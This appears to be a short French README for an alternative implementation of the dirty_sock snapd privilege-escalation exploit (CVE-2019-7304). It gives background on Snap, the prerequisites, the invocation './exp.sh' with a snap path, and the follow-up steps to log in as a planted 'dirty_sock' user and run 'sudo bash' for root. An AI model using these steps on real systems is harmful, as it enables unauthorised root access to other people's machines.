
Une autre implémentation pour l'exploit d'escalade de privilèges sous Linux via snap(d) (CVE-2019-7304)
Une autre implémentation pour l'exploitation d'escalade de privilèges Linux via snap(d) (CVE-2019-7304)
Snap est un système d'empaquetage et de déploiement de logiciels développé par Canonical pour les systèmes d'exploitation utilisant le noyau Linux. Les paquets, appelés snaps, et l'outil pour les utiliser, snapd, fonctionnent sur une gamme de distributions Linux et permettent aux développeurs de logiciels amont de distribuer leurs applications directement aux utilisateurs. Les snaps sont des applications autonomes s'exécutant dans un bac à sable avec un accès médiatisé au système hôte. Snap a été initialement publié pour les applications cloud[1] mais a ensuite été porté pour fonctionner sur les appareils de l'Internet des objets[3][4] et également pour les applications de bureau[6].
dirty_sock: Élévation de privilèges Linux (via snapd)
- snap installé sur le système
- vous avez sudo avec ou sans mot de passe sur snap
./exp.sh "snap_path" "pwd"
ex:
./exp.sh "/usr/bin/snap" "/home/evil"
ensuite vous pouvez utiliser
su - dirty_sock
dirty_sock (as password)
sudo bash